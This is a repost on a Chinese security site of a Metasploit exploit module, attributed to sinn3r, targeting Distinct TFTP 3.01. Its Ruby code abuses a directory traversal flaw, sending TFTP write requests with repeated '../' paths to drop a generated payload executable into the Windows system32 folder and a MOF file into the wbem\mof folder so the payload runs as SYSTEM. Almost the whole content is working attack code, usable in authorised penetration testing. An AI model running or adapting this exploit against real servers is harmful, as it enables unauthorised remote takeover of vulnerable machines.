首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Distinct TFTP 3.01 Writable Directory Traversal Execution
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-05-14  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Rex::Proto::TFTP
 include Msf::Exploit::EXE
 include Msf::Exploit::WbemExec

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Distinct TFTP 3.01 Writable Directory Traversal Execution",
   'Description'    => %q{
     This module exploits a vulnerability found in Distinct TFTP server.  The
    software contains a directory traversal vulnerability that allows a remote
    attacker to write arbitrary file to the file system, which results in
    code execution under the context of 'SYSTEM'.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'modpr0be',  #Initial discovery, PoC (Tom Gregory)
     'sinn3r'     #Metasploit
    ],
   'References'     =>
    [
     ['OSVDB', '80984'],
     ['EDB', '18718'],
     ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf']
    ],
   'Payload'        =>
    {
     'BadChars' => "\x00",
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "none"
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     ['Distinct TFTP 3.01 on Windows', {}]
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Apr 8 2012",
   'DefaultTarget'  => 0))

  register_options([
   OptInt.new('DEPTH', [false, "Levels to reach base directory",10]),
   OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
   OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
  ], self.class)
 end

 def upload(filename, data)
  tftp_client = Rex::Proto::TFTP::Client.new(
   "LocalHost"  => "0.0.0.0",
   "LocalPort"  => 1025 + rand(0xffff-1025),
   "PeerHost"   => datastore['RHOST'],
   "PeerPort"   => datastore['RPORT'],
   "LocalFile"  => "DATA:#{data}",
   "RemoteFile" => filename,
   "Mode"       => "octet",
   "Context"    => {'Msf' => self.framework, "MsfExploit" => self },
   "Action"     => :upload
  )

  ret = tftp_client.send_write_request { |msg| print_status(msg) }
  while not tftp_client.complete
   select(nil, nil, nil, 1)
   tftp_client.stop
  end
 end

 def exploit
  peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

  # Setup the necessary files to do the wbemexec trick
  exe_name = rand_text_alpha(rand(10)+5) + '.exe'
  exe      = generate_payload_exe
  mof_name = rand_text_alpha(rand(10)+5) + '.mof'
  mof      = generate_mof(mof_name, exe_name)

  # Configure how deep we want to traverse
  depth  = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
  levels = "../" * depth

  # Upload the malicious executable to C:\Windows\System32\
  print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
  upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)

  # Let the TFTP server idle a bit before sending another file
  select(nil, nil, nil, 1)

  # Upload the mof file
  print_status("#{peer} - Uploading .mof...")
  upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WikkaWiki 1.3.2 Spam Logging P
·AnvSoft Any Video Converter 4.
·Adobe Photoshop CS5.1 U3D.8BI
·Firefox 8/9 AttributeChildRemo
·PHP 5.4 (5.4.3) Code Execution
·ABBS Media Player 3.1 Buffer O
·Asterisk 'ast_parse_digest()'
·NEC Backdoor Administrative Ac
·DecisionTools SharpGrid Active
·Topics viewer v 2.3 csrf (Add
·Guitar Pro 6.1.1 r10791 (.gpx)
·TFTP Server 1.4 ST(RRQ) Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved